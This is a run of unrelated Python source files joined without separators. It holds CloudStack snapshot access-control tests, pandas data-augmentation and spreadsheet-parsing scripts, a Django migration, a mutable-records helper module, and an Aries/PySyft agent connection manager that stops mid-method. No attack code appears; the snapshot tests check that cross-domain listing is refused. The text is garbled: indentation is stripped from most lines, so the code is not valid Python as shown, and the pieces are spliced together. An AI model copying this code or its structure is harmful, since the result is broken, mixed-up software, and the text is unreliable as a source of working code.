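    # The negative tests below rely on the CloudStack API itself rejecting the request:
    # each Snapshot.list() call is wrapped in try/except, and self.fail() is only reached
    # if the call unexpectedly succeeds.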
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_cross_domainid_accountid(self):
"""
        Regular User should not be allowed to list Snapshots of other accounts in the same domain
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1b.user[0].username, domainid=self.domain_1.id)
self.fail("Regular User is able to use another account with in the same domain in listVirtualMachine call")
except Exception as e:
self.debug("List as Regular User passing domainId and accountId of another account %s" % e)
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_cross_domainid(self):
"""
        Regular User should not be allowed to list Snapshots of other accounts in other domains
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_2_snapshot.id)
self.fail("Regular User is able to use another domain in listVirtualMachine call")
except Exception as e:
self.debug("List as Regular User passing domainId of a domain that user does not belong to %s" % e)
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_cross_domainid_accountid(self):
"""
        Domain admin should not be allowed to list Snapshots of accounts in other domains
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, account=self.account_d2a.user[0].username, domainid=self.domain_2_snapshot.id)
self.fail("Domain admin user is able to use another domain in listVirtualMachine call")
except Exception as e:
self.debug("List as domain admin passing domainId and accountId of another account %s" % e)
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_cross_domainid(self):
"""
        Domain admin should not be allowed to list Snapshots from other domains
"""
        self.apiclient.connection.apiKey = self.user_d1_apikey
        self.apiclient.connection.securityKey = self.user_d1_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_2_snapshot.id)
self.fail("Domain admin User is able to use another domain in listVirtualMachine call")
except Exception as e:
self.debug("List as domain admin passing domainId of a domain that user does not belong to %s" % e)
## List test cases relating to filter - id
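    # The tests below filter by snapshot uuid via the "id" parameter. Authorization is
    # asserted indirectly: an authorized caller gets a one-element list back, while an
    # unauthorized caller gets None from Snapshot.list().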
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_owns(self):
"""
Domain admin should be able to list Snapshots that he owns by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList = Snapshot.list(self.apiclient, id=self.vm_d1_snapshot.id)
self.assertNotEqual(SnapshotList,
None,
"Domain Admin is not able to list Snapshotss that he owns")
self.assertEqual(len(SnapshotList),
1,
"Domain Admin is not able to list Snapshotss that belongs to him")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersindomain(self):
"""
        Domain admin should be able to list Snapshots that are owned by any account in his domain by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_d1a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"Domain Admin is not able to list Snapshotss from his domain")
self.assertEqual(len(SnapshotList1),
1,
"Domain Admin is not able to list Snapshotss from his domain")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersinsubdomain(self):
"""
        Domain admin should be able to list Snapshots that are owned by any account in his sub-domain by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList2 = Snapshot.list(self.apiclient, id=self.vm_d12b_snapshot.id)
self.assertNotEqual(SnapshotList2,
None,
"Domain Admin is not able to list Snapshotss from his sub domain")
self.assertEqual(len(SnapshotList2),
1,
"Domain Admin is not able to list Snapshotss from his sub domain")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersnotindomain(self):
"""
        Domain admin should not be able to list Snapshots that are owned by an account outside his domain by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList3 = Snapshot.list(self.apiclient, id=self.vm_d2_snapshot.id)
self.assertEqual(SnapshotList3,
None,
"Domain Admin is able to list Snapshotss from other domains!!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersinsubdomain2(self):
"""
        Domain admin should be able to list Snapshots that are owned by an account in his sub-domains by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList4 = Snapshot.list(self.apiclient, id=self.vm_d111a_snapshot.id)
self.assertNotEqual(SnapshotList4,
None,
"Domain Admin is not able to list Snapshotss from his subdomain")
self.assertEqual(len(SnapshotList4),
1,
"Domain Admin is not able to list Snapshotss from his sub domains")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_rootadmin_owns(self):
"""
        ROOT admin should be able to list Snapshots that he owns by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"ROOT Admin not able to list Snapshotss that he owns")
self.assertEqual(len(SnapshotList1),
1,
"ROOT Admin not able to list Snapshotss that he owns")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_rootadmin_Snapshotsownedbyothers(self):
"""
        ROOT admin should be able to list Snapshots that are owned by any account by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.default_apikey
self.apiclient.connection.securityKey = self.default_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_d2_snapshot.id)
SnapshotList2 = Snapshot.list(self.apiclient, id=self.vm_d11a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"ROOT Admin not able to list Snapshotss from other domains")
self.assertNotEqual(SnapshotList2,
None,
"ROOT Admin not able to list Snapshotss from other domains")
self.assertEqual(len(SnapshotList1),
1,
"ROOT Admin not able to list Snapshotss from other domains")
self.assertEqual(len(SnapshotList2),
1,
"ROOT Admin not able to list Snapshotss from other domains")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_user_own(self):
"""
        Regular user should be able to list Snapshots that he owns by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d11a_apikey
self.apiclient.connection.securityKey = self.user_d11a_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_d11a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"Regular User is not able to list Snapshotss that he owns")
self.assertEqual(len(SnapshotList1),
1,
"Regular User is not able to list Snapshotss that he owns")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_user_snapshotfromsamedomaindifferentaccount(self):
"""
        Regular user should not be able to list Snapshots that are owned by a different account in the same domain by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d11a_apikey
self.apiclient.connection.securityKey = self.user_d11a_secretkey
SnapshotList2 = Snapshot.list(self.apiclient, id=self.vm_d11b_snapshot.id)
self.assertEqual(SnapshotList2,
None,
"Regular User is able to list Snapshotss from other accounts")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_user_snapshotfromotherdomain(self):
"""
        Regular user should not be able to list Snapshots that are owned by a different account in a different domain by passing uuid in the "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d11a_apikey
self.apiclient.connection.securityKey = self.user_d11a_secretkey
SnapshotList3 = Snapshot.list(self.apiclient, id=self.vm_d2_snapshot.id)
self.assertEqual(SnapshotList3,
None,
"Regular User is able to list Snapshotss from other domains")
@staticmethod
def generateKeysForUser(apiclient, account):
user = User.list(
apiclient,
account=account.name,
domainid=account.domainid
)[0]
return (User.registerUserKeys(
apiclient,
user.id
))
@staticmethod
def checkForExistenceOfValue(list, attributeValue):
if list is None:
return False
rowCount = len(list)
for num in range(rowCount):
if list[num].id == attributeValue:
return True
return False
import pandas as pd
#tech = ['sharpen','elasticdeformation','horizontalline','diagonalline','diagonalinverseline','verticalleftline','verticalrightline','severalrowsline',
# 'severalcolsline', 'severalcolsrowsline', 'superpixel', 'gaussianblur', 'additivegaussiannoise','dropout','translation','rotation90','rotation-90','rotation5','rotation-5']
tech2 = ['horizontalline','verticalleftline','verticalrightline','translation','superpixel', 'additivegaussiannoise',
'elasticdeformation','gaussianblur','sharpen','rotation5','rotation-5','dropout']
#df = pd.read_csv('/home/ahmed/Pictures/cogedis/cogedis_words_3/words.csv')
#df = pd.read_csv('/home/ahmed/Pictures/cogedis/data_crnn/augmented_without_test/digit.csv')
df = pd.read_csv('/home/ahmed/Pictures/cogedis/24072017/split/all/all_valid.csv')
df = df.astype(str)
df = df.iloc[:, 0:4]
df3=df[~df.manual_raw_value.str.match(r'^[\d,:.+\'%/-]*$')]
df = df[df.manual_raw_value.str.match(r'^[\d,:.+\'%/-]*$')]
#df = pd.read_csv('/home/ahmed/Pictures/cogedis/data_crnn/augmented_without_test/digit.csv')
dfs = []
def f(x):
df = pd.DataFrame({'id':[x['id'] + '_' + t for t in tech2],
'ocr':x['ocr'],
'manual_raw_value':x['manual_raw_value'],
'raw_value':x['raw_value']})
#print (df)
dfs.append(df)
df.apply(f, axis=1)
df1 = pd.concat(dfs)
#print (df1)
df2 = pd.concat([df, df1, df3], ignore_index=True).reindex(columns=df.columns)
#df2.to_csv('/home/ahmed/Pictures/cogedis/cogedis_words_3/words_augmented.csv',sep=',')
df2.to_csv('/home/ahmed/Pictures/cogedis/24072017/split/all/all_valid_augmented.csv',sep=',',index=False)
import jyx
jyx.Jyx()
import pandas as pd
df = pd.DataFrame()
files = pd.read_csv('grandtlinks.csv')
try:
files['status'] = files['status'].astype(str)
header=False
except KeyError:
files['status'] = ''
header=True
for index, row in files.iterrows():
if row['status'] == 'parsed':
continue
filename = row['filename']
data = pd.read_csv(f'data/{filename}')
data = data.iloc[:-2]
fecha = data.fecha[0]
data = data.rename(columns={f'F{fecha}':'Puntaje'})
data['Cotizacion'] = data['Cotización'].str.replace(r'\.', '', regex=True)
if 'GC.1' in data.columns:
data.rename(columns={'GC':'G', 'POS':'Puesto', 'GC.1':'GC'}, inplace=True)
data.drop(data.filter(regex=r'F\d+').columns, axis=1, inplace=True)
data.drop(columns=['PcG', 'PCG', 'AcG', 'PrG', 'PCT', 'CG', 'CT', 'PcG', 'AcT', 'Cotización'], axis=1, inplace=True, errors='ignore')
df = df.append(data)
files.at[index, 'status'] = 'parsed'
df.to_csv('grandtdata.csv', mode='a', header=header, index=False)
files.to_csv('grandtlinks.csv', index=False)
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-09-11 21:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('resale', '0003_change_coords'),
]
operations = [
migrations.AlterModelOptions(
name='resaleapartment',
options={'ordering': ('-id',), 'permissions': (('can_add_change_delete_all_resale', 'Имеет доступ к чужим данным по вторичке'),), 'verbose_name': 'объект вторичка', 'verbose_name_plural': 'объекты вторички'},
),
]
#!/usr/bin/env python3
"""Creates records, similar to collections.namedtuple.
Creates a record class like namedtuple, but mutable and with optional
attributes.
Optional attributes take a value or a callable (make sure to use a factory
function otherwise the same object will be shared among all the record
instances, like collections.defaultdict).
Example:
FirstRecord = records.Record('FirstRecord', ['attr1', 'attr2'], {'attr3': 0})
foo = FirstRecord(1, 2, attr3=3)
bar = FirstRecord(attr1=1, attr2=2, attr3=5)
class Second(FirstRecord):
required_attributes = ['second1']
optional_attributes = {'second2': 5}
# Second requires attr1, attr2, and second1.
baz = Second(1, 2, 3, second2=4)
"""
import copy
import itertools
import sys
class RecordClass(object):
__slots__ = ()
required_attributes = ()
optional_attributes = {}
def __init__(self, *args, **kwargs):
# First, check that at least the required number of arguments was provided.
required_attributes = type(self).required_attributes
if len(args) + len(kwargs.keys()) < len(required_attributes):
raise ValueError(
'Invalid arguments', type(self), args, kwargs, self.__slots__)
# Second, check if there are any overlapping arguments.
conflicts = (frozenset(kwargs.keys()) &
frozenset(required_attributes[:len(args)]))
if conflicts:
raise TypeError(
'Keyword arguments conflict with positional arguments: %s',
conflicts)
# Third, check all required attributes are provided.
required_kwargs = set(kwargs.keys()) & set(required_attributes)
num_provided = len(args) + len(required_kwargs)
if num_provided != len(required_attributes):
raise TypeError(
'__init__ takes exactly %d arguments but %d were given: %s' % (
len(required_attributes), num_provided,
required_attributes))
for slot, arg in itertools.chain(
zip(type(self).required_attributes, args), kwargs.items()):
object.__setattr__(self, slot, arg)
# Set defaults.
for attr, value in type(self).optional_attributes.items():
if attr not in kwargs:
if callable(value):
value = value()
object.__setattr__(self, attr, value)
def __str__(self):
return self._str(type(self).all_attribute_names)
def _str(self, str_attrs):
attrs = []
for attr in str_attrs:
attrs.append('%s=%s' % (attr, repr(getattr(self, attr))))
return '%s(%s)' % (type(self).__name__, ', '.join(attrs))
__repr__ = __str__
def __eq__(self, other):
return (
self is other
or type(self) == type(other)
and self._isequal_fields(other, self.__slots__))
def __ne__(self, other):
return not self == other
def _isequal_fields(self, other, fields):
return all(getattr(self, attr) == getattr(other, attr)
for attr in fields)
def __copy__(self):
return type(self)(**{attr: getattr(self, attr)
for attr in self.__slots__})
def __deepcopy__(self, memo):
return type(self)(**{attr: copy.deepcopy(getattr(self, attr), memo)
for attr in self.__slots__})
def __getstate__(self):
"""Get the current state of all attributes."""
return {attr: getattr(self, attr) for attr in type(self).__slots__}
def __setstate__(self, state):
"""Set the state of attributes."""
for attr, value in state.items():
setattr(self, attr, value)
class HashableRecordClass(RecordClass):
"""Hashable version of RecordClass.
Use this when the record is considered immutable enough to be hashable.
Immutability is not enforced, but is recommended.
Do not use if the record or any of its fields' values will ever be modified.
"""
def __hash__(self):
return hash(
tuple(hash(getattr(self, attr)) for attr in self.__slots__))
class RecordMeta(type):
def __new__(cls, name, bases, attrs):
required_attributes = [] # Combine the bases' req attrs first.
attrs['optional_attributes'] = attrs.get('optional_attributes', {})
for base in bases:
if issubclass(base, RecordClass):
# Check for repeated attributes first.
repeats = (set(required_attributes) &
set(base.required_attributes))
assert not repeats, 'Required attributes clash: %s' % repeats
repeats = (set(attrs['optional_attributes']) &
set(base.optional_attributes))
assert not repeats, 'Optional attributes clash: %s' % repeats
required_attributes.extend(base.required_attributes)
attrs['optional_attributes'].update(base.optional_attributes)
# If this class defines any attributes in a superclass's
# required attributes, make it an optional attribute with a
# default with the given value.
provided = set(base.required_attributes) & set(attrs)
for attr in provided:
required_attributes.remove(attr)
attrs['optional_attributes'][attr] = attrs.pop(attr)
# Allow the class to override optional attribute defaults
# as well.
provided = set(base.optional_attributes) & set(attrs)
for attr in provided:
attrs['optional_attributes'][attr] = attrs.pop(attr)
attrs['required_attributes'] = tuple(
required_attributes + list(attrs.get('required_attributes', ())))
attrs['__slots__'] = (tuple(attrs['required_attributes']) +
tuple(attrs['optional_attributes'].keys()))
return super(RecordMeta, cls).__new__(cls, name, bases, attrs)
def __str__(cls):
return '<Record: %s>' % cls.__name__
__repr__ = __str__
def __eq__(cls, other):
if not isinstance(other, RecordMeta):
return False
return (
cls is other
or cls.required_attributes == other.required_attributes
and cls.optional_attributes == other.optional_attributes)
def __ne__(self, other):
return not self == other
def __hash__(cls):
return hash(
(cls.required_attributes,
frozenset(cls.optional_attributes.items())))
@property
def all_attribute_names(cls):
return itertools.chain(
cls.required_attributes,
cls.optional_attributes.keys())
def Record(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
cls = RecordMeta(cls_name, (RecordClass,), attrs)
# Copied from collections.py, the bottom of namedtuple:
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in environments where
# sys._getframe is not defined (Jython for example).
if hasattr(sys, '_getframe'):
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
return cls
def HashableRecord(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
return RecordMeta(cls_name, (HashableRecordClass,), attrs)
def CopyRecord(record, **field_overrides):
"""Copies a record and its fields, recurses for any field that is a Record.
For records that have nested mutable fields, use copy.deepcopy.
Args:
record: A Record instance to be copied.
**field_overrides: Fields and their values to override in the new copy.
Returns: A copy of the given record with any fields overridden.
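Example (illustrative; Point is a hypothetical record built with the Record factory above):
    Point = Record('Point', ['x', 'y'])
    p = Point(1, 2)
    q = CopyRecord(p, y=5)  # q.x == 1, q.y == 5; p is left unchanged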
"""
fields = field_overrides
for field in record.__slots__:
if field in field_overrides:
continue
value = getattr(record, field)
if isinstance(value, RecordClass):
# Recurse for records.
new_value = CopyRecord(value)
else:
new_value = copy.copy(value)
fields[field] = new_value
return type(record)(**fields)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Provides managers specific to SSI / Trust Triangle roles.
AgentConnectionManager (ACM) is based on PySyft's DuetCredentialExchanger class. The class helps to manage Aries
agents, send messages, and establish Aries and Duet connections. Specifically, active Aries connections are
used to establish Duet connections. The subclasses (RelyingParty, CredentialHolder, IssuingAuthority) have
functionalities that are specific to their roles in the trust triangle (e.g., only IssuingAuthority can issue
verifiable credentials).
Note: there are two types of connections
(1) Aries Connections (via ACA-PY agents) to send messages and exchange verifiable credentials
(2) Duet Connections (via PySyft's Duet) to exchange data and host an encrypted database
The Aries Connections are established by manually exchanging an invitation (e.g., QR-code or json posted online or
sent via E-Mail). Then, messages are sent via the Aries Connection to establish Duet Connections.
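Example (illustrative sketch; assumes an AriesAgentController instance named agent_controller
has already been configured elsewhere):
    holder = CredentialHolder(agent_controller)
    connection_id = holder.receive_connection_invitation(alias="issuer", auto_accept=True)
    holder.send_message(connection_id, "Hello")
    holder.verify_inbox()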
"""
# Standard libraries and 3rd party packages
import ast
import asyncio
import json
import time
from typing import Dict as TypeDict
from typing import Optional
from typing import Tuple
from typing import Union
import nest_asyncio
import requests
# from libs.aries_basic_controller import AriesAgentController
from aries_cloudcontroller import AriesAgentController
from pprintpp import pprint
from syft.grid.duet.exchange_ids import DuetCredentialExchanger
# local sources
from .connection import Connection
from .helpers import *
from .message import Message
nest_asyncio.apply()
class AgentConnectionManager(DuetCredentialExchanger): # dce
def __init__(self, agent_controller: AriesAgentController) -> None:
"""
Initialize the AgentConnectionManager (ACM). The class builds on top of the DuetCredentialExchanger
(see https://github.com/OpenMined/PySyft/blob/7049ca017cf26074518c02d4891283c6e1101df5/packages/syft/src/syft/grid/duet/exchange_ids.py),
which is defined by the PySyft package. A DuetCredentialExchanger allows to exchange Duet Tokens
to initiate a Duet connection.
Args:
agent_controller:
"""
super().__init__() # Initiate DuetCredentialExchanger
self.agent_controller = agent_controller # For aries agent
self.agent_listeners = [
{"topic": "connections", "handler": self._connections_handler},
{"topic": "basicmessages", "handler": self._messages_handler},
]
self.connections: TypeDict = {} # Dict of connections established with agent_controller {connection_id : Connection}
self.messages: [Message] = [] # List of messages agent_controller received
self.role: Optional[str] = None # Role of agent controller (e.g., RelyingParty)
self.duet_connection_id: Optional[str] = None # ID of connection through which to establish a Duet connection
def run(self, credential: str = "") -> Optional[str]:
"""
Default function required for any subclass of DuetCredentialExchanger. Defines what credential_exchanger (i.e.,
agent_controller) should do when they initiate or join a Duet connection. Uses the connection_id previously
set as self.duet_connection_id
Args:
credential: duet token obtained from the Duet network
(see https://github.com/OpenMined/PySyft/blob/f4717d2944593460df9b431e9143c1d1208dc45d/packages/syft/src/syft/grid/duet/__init__.py)
Returns: responder_id (duet token of duet partner who initiated the duet connection)
OR client_id (duet token of duet partner who is joining the duet connection)
"""
# Get duet_connection and set duet_token to duet token (self.duet_connection_id is set in agents' notebooks beforehand)
self._update_connection(connection_id=self.duet_connection_id, token=credential)
# Process if agent is joining the duet connection:
if self.join:
self._duet_invitee_exchange(credential=credential)
return self.responder_id
# Process if agent is initiating the duet connection:
else:
client_id = self._duet_inviter_exchange(credential=credential)
return client_id
def get_duet_connection(self) -> Connection:
"""
Gets Aries connection over which a Duet connection is being established
Returns: Connection
"""
return self.get_connection(self.duet_connection_id)
def get_duet_connections(self) -> [Connection]:
"""
Get all Aries Connections through which a Duet Connection is established
Returns: list of Connections
"""
return [c for _id, c in self.connections.items() if c.is_duet_connection is True]
def _duet_inviter_exchange(self, credential: str) -> str:
"""
Proceed to initiate Duet connection as an inviter: (1) send credential (i.e., duet_token) to duet partner and
(2) await the duet token of the joining duet partner
Args:
credential: duet token of the agent herself
Returns: duet_token_partner is the duet token of the duet partner
"""
# Get duet connection
duet_conn = self.get_duet_connection()
# Send credential (i.e., duet token) to the joining duet partner
self._send_duet_token(credential, 1, duet_conn)
# Await the response of the duet partner (i.e., another duet token)
token_partner = self._await_partner_duet_token(2, duet_conn)
return token_partner
def _duet_invitee_exchange(self, credential: str) -> None:
"""
Proceed to join a Duet connection as an invitee: (1) Await duet token of inviting partner, (2) reset responder
ID (because otherwise it is only set as ""), and send duet token to the inviting party.
Args:
credential: duet token of invitee
Returns: -
"""
# Get duet connection
duet_conn = self.get_duet_connection()
token_partner = duet_conn.duet_token_partner
# Await duet_token_partner if the inviting duet partner has not yet sent a duet token,
# or Future() is already initiated
if token_partner is None or token_partner is asyncio.Future():
token_partner = self._await_partner_duet_token(1, duet_conn)
# Else print that a duet token was already received
else:
print("\n♫♫♫ >", colored("STEP 1:", attrs=["bold"]), "Obtained Duet Token {c}".format(c=token_partner))
print("♫♫♫ > from Duet Partner {n}".format(n=duet_conn.connection_with))
print("♫♫♫ > via Connection ID {cid}".format(cid=duet_conn.connection_id))
# Reset responder_id (of DuetCredentialExchanger) to the duet token obtained by the partner -> relevant for
# the proper functionality of the DuetCredentialExchanger
self.set_responder_id(token_partner)
# Send duet token to initiating duet partner
self._send_duet_token(credential, 2, duet_conn)
print("\n♫♫♫ > ...waiting for partner to connect...")
def _send_duet_token(self, credential: str, step: int, duet_conn: Connection) -> None:
"""
Send duet token to partner and print information
Args:
credential: duet token that should be sent
step: step number (so internal function can be used in different situations)
duet_conn: Aries connection over which a Duet Connection is established
Returns: -
"""
# Send duet token to duet partner
print("\n♫♫♫ >", colored("STEP {n}:".format(n=str(step)), attrs=["bold"]),
"Sending Duet Token {c}".format(c=credential))
print("♫♫♫ > to Duet Partner {n}".format(n=duet_conn.connection_with))
print("♫♫♫ > via Connection ID {cid}".format(cid=self.duet_connection_id))
self.send_message(self.duet_connection_id, "Duet Token : {c}".format(c=credential), duet_print=True)
def _await_partner_duet_token(self, step: int, duet_conn: Connection) -> str:
"""
Await duet token from partner and print information
Args:
step: step number to print function call as correct step
duet_conn: Aries connection over which a Duet Connection is established
Returns: the partner's duet token as a string
"""
# Set Duet Token to asyncio.Future() (i.e. we are awaiting a result) and wait until it is set
print("\n♫♫♫ >", colored("STEP {n}:".format(n=str(step)), attrs=["bold"]),
"Awaiting Duet Token from Duet Partner...")
if duet_conn.duet_token_partner is None:
self._update_connection(connection_id=duet_conn.connection_id, token_partner=asyncio.Future())
# Wait until duet_token_partner is set a Future() with status "Finished"
loop = asyncio.get_event_loop()
duet_token_partner = loop.run_until_complete(duet_conn.duet_token_partner)
# Print duet_token_partner info and return
print("\n♫♫♫ >", colored("DONE!", COLOR_SUCCESS, attrs=["bold"]), "Partner's Duet Token:",
str(duet_token_partner))
return str(duet_token_partner)
def get_connection(self, connection_id: str) -> Optional[Connection]:
"""
Get connection by connection_id
Returns: Connection (if it exists) or None
"""
for _id, connection in self.connections.items():
if _id == connection_id:
return connection
return None
def get_connections(self) -> list[Optional[Connection]]:
"""
Returns: Get all connections of the agent
"""
return list(self.connections.values())
def get_active_connections(self) -> list[Optional[Connection]]:
"""
Get all connections where Connection.is_active = True
Returns: list of active connections
"""
return [c for _id, c in self.connections.items() if c.is_active is True]
def get_connection_id(self, agent_name: str) -> list[str]:
"""
Returns list of connection IDs with a particular agent
Args:
agent_name: name of agent with whom the connection is shared
Returns: list of connection ids shared with agent_name
"""
connection_ids = [_id for _id, c in self.connections.items() if c.connection_with == agent_name]
return connection_ids
def _update_connection(self,
connection_id: str,
auto_accept: Optional[bool] = None,
auto_ping: Optional[bool] = None,
alias: Optional[str] = None,
connection_with: Optional[str] = None,
is_active: Optional[bool] = None,
is_duet_connection: Optional[bool] = None,
token_partner: Optional[str] = None,
token: Optional[str] = None,
reset_duet: bool = False
) -> Connection:
"""
Verify if connection_id exists already. If yes, update and return it.
Else, add it to self.connections, configure it, and return it.
Args:
connection_id: connection_id
auto_accept: whether connection is auto_accepted or not
auto_ping: whether connection should be auto_pinged or not
alias: whether connection has an alias or not
Returns: Connection (either new or updated)
"""
# Get conn. If conn does not yet exist, this will return None
conn = self.get_connection(connection_id)
# Else create a new conn
if conn is None:
conn = Connection(connection_id)
# Update variables of conn
if auto_accept is not None:
conn.auto_accept = auto_accept
if auto_ping is not None:
conn.auto_ping = auto_ping
if alias is not None:
conn.alias = alias
if is_active is not None:
conn.is_active = is_active
if connection_with is not None:
conn.connection_with = connection_with
if is_duet_connection is not None:
conn.is_duet_connection = is_duet_connection
self.duet_connection_id = connection_id
update_future = False
# Reset all duet configurations if reset
if reset_duet is True:
self.duet_connection_id = None if is_duet_connection is None else connection_id
conn.is_duet_connection = False if is_duet_connection is None else is_duet_connection
# Do not update duet_token_partner if duet_token is None (because then the duet_token_partner value might
# be the value we just obtained from the duet partner)
if (conn.duet_token is not None) and (conn.duet_token_partner is not None):
conn.duet_token_partner = None
conn.duet_token = None
else:
if token is not None:
conn.duet_token = token
conn.is_duet_connection = True
self.duet_connection_id = connection_id
if token_partner is not None:
conn.is_duet_connection = True
self.duet_connection_id = connection_id
# Else, set duet_token_partner as string
if conn.duet_token_partner is None:
conn.duet_token_partner = token_partner
else:
update_future = True # boolean to remember we need to execute this at the end
# Add or update connection to self.connections
self.connections[connection_id] = conn
# Execute after updating most of the dictionary, because "set_result" will trigger the _await_ function to run
if update_future:
try:
self.connections[connection_id].duet_token_partner.set_result(token_partner)
except:
self.connections[connection_id].duet_token_partner = token_partner
return self.connections[connection_id]
def get_message(self, message_id: Optional[str] = None) -> Optional[Message]:
"""
Get a message by message_id (prompts for the ID if none is given) and print its details
Returns: the Message if found, otherwise None
"""
# Get message ID if it was not provided
if message_id is None:
print(colored("Please enter Message ID :", COLOR_INPUT, attrs=["bold"]),
colored("(Check agent.verify_inbox() if you do not know the message ID)", COLOR_INPUT))
message_id = input(colored("ID: ", COLOR_INPUT))
# Iterate through messages and print message with message_id
for message in self.messages:
if message.message_id == message_id:
print("\n---------------------------------------------------------------------")
print(colored("Message received", attrs=["bold"]))
print("Connection ID : ", message.connection_id)
print("Message ID : ", message.message_id)
print("State : ", message.state)
print("Time : ", message.sent_time)
print("Text : ", colored(message.content, COLOR_INFO))
print("---------------------------------------------------------------------")
return message
return None
def get_messages(self) -> list[Optional[Message]]:
"""
Returns: Get all messages of the agent
"""
return self.messages
def verify_inbox(self) -> list[Optional[Message]]:
"""
Prints all available messages received, grouped by Connection ID
Returns: list of all message IDs
"""
print("\n---------------------------------------------------------------------")
print(colored("Message Inbox", attrs=["bold"]))
if len(self.messages) == 0:
print("> Inbox empty")
else:
unique_c_ids = [m.connection_id for m in self.messages]
for c_id in set(unique_c_ids):
m_ids = [m.message_id for m in self.messages if m.connection_id == c_id]
print("> {count} Message(s) via Connection ID {cid}:".format(count=unique_c_ids.count(c_id), cid=c_id))
for m_id in m_ids:
print("\t * Message ID : ", m_id)
print("---------------------------------------------------------------------")
return [m.message_id for m in self.messages]
def get_role(self) -> str:
"""
Get the VC / SSI Role of the agent
Returns: string describing the VC / SSI Role of the agent
"""
return self.role
def get_agent_listeners(self) -> list[dict]:
"""
Returns: Get all agent_listeners of the agent
"""
return self.agent_listeners
def get_credentials(self):
"""
Get all credentials that the agent controller has stored in their wallet
Returns: list of all credentials (i.e., VCs)
"""
loop = asyncio.get_event_loop()
credentials = loop.run_until_complete(
self.agent_controller.credentials.get_all()
)
return credentials
def create_connection_invitation(self, alias: Optional[str] = None, auto_accept: bool = True, public: bool = False,
multi_use: bool = False, auto_ping: bool = True) -> Union[str, dict]:
"""
Creates invitation by agent_controller, and prints the invitation that must be forwarded to an external agent.
In case arguments are conservative (i.e., auto_accept = False), the function prompts the user to make
decisions right away whether to accept the external agent's response to the invitation.
Args:
alias: Alias name for invited connection
auto_accept: auto-accept the responses sent by the external agent
public: Use public DID
multi_use: Use invitation for multiple invitees
auto_ping: Automatically ping connection
Returns: connection_id of invitation
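Example (illustrative; acm_inviter and acm_invitee are two AgentConnectionManager instances
backed by different agents):
    # Inviter side: prints the invitation, to be shared out of band
    connection_id = acm_inviter.create_connection_invitation(alias="partner")
    # Invitee side: paste the printed invitation when prompted
    connection_id = acm_invitee.receive_connection_invitation(alias="partner")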
"""
# Loop until connection is created
loop = asyncio.get_event_loop()
invitation_response = loop.run_until_complete(
self.agent_controller.connections.create_invitation(str(alias).lower(), str(auto_accept).lower(),
str(public).lower(), str(multi_use).lower())
)
# Get connection_id and store as new connection in self (or update existing connection)
connection_id = invitation_response["connection_id"]
